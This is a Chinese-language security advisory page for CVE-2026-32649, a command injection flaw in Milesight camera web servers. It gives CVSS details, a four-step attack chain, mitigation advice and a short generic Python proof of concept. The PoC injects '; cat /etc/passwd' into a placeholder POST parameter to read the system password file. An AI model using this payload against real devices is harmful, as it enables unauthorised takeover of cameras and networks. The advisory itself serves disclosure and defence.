CVE-2026-32649 CVSS 6.8 中危

CVE-2026-32649 Milesight摄像头命令注入漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32649

漏洞类型

命令注入

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Milesight 摄像头

漏洞概述

Milesight摄像头特定固件版本的Web服务器中存在命令注入漏洞。由于对用户输入缺乏有效过滤，具备高权限的攻击者通过用户交互可触发该漏洞，在系统上执行任意命令。成功利用可能导致设备被完全控制，造成敏感信息泄露、系统完整性破坏及服务不可用，严重威胁物联网环境安全。

技术细节

该漏洞源于Milesight摄像头Web服务器在处理特定HTTP请求时，未对用户提交的参数进行严格的输入验证和过滤。攻击者可以构造包含Shell元字符（如; | & `）的恶意数据包，通过Web接口发送至服务器。尽管CVSS向量要求高权限（PR:H）和用户交互（UI:R），通常意味着攻击者需要诱导管理员执行特定操作或利用现有权限，但在满足条件下，恶意输入将拼接到系统命令中执行。这种命令注入漏洞允许攻击者绕过应用层限制，直接在底层操作系统执行任意指令，从而获取设备控制权，进一步可能导致横向移动或设备被接管。

攻击链分析

STEP 1

侦察

攻击者通过网络扫描或资产探测，发现互联网暴露的Milesight摄像头设备及其Web管理接口。

STEP 2

漏洞利用

攻击者利用获取的高权限账号或诱导管理员交互，向存在漏洞的Web接口发送包含恶意Shell命令的特制HTTP请求。

STEP 3

命令执行

服务器端Web应用未过滤恶意字符，将其拼接到系统命令中执行，导致攻击者在设备操作系统层面执行任意代码。

STEP 4

后渗透

攻击者获取设备Shell权限，进一步窃取视频流数据、修改配置或将设备作为跳板攻击内网其他资产。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://<target_ip>/<vulnerable_endpoint>"

# Malicious payload to execute a command (e.g., cat /etc/passwd)
payload = "; cat /etc/passwd"

# Data to be sent (example parameter)
data = {
    "param_name": payload
}

try:
    # Send POST request with the payload
    response = requests.post(target_url, data=data, timeout=5)
    
    # Check if the command was executed
    if response.status_code == 200 and "root:" in response.text:
        print("[+] Vulnerability confirmed! Command injection successful.")
        print(response.text)
    else:
        print("[-] Exploit failed or target not vulnerable.")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Milesight 摄像头特定固件版本 (具体受影响版本请参考厂商安全公告)

防御指南

临时缓解措施

建议立即检查设备固件版本，若受影响请尽快升级。在未修复前，建议将设备放置在内网隔离区，禁止公网直接访问管理端口，并加强网络流量监控，拦截异常的HTTP请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表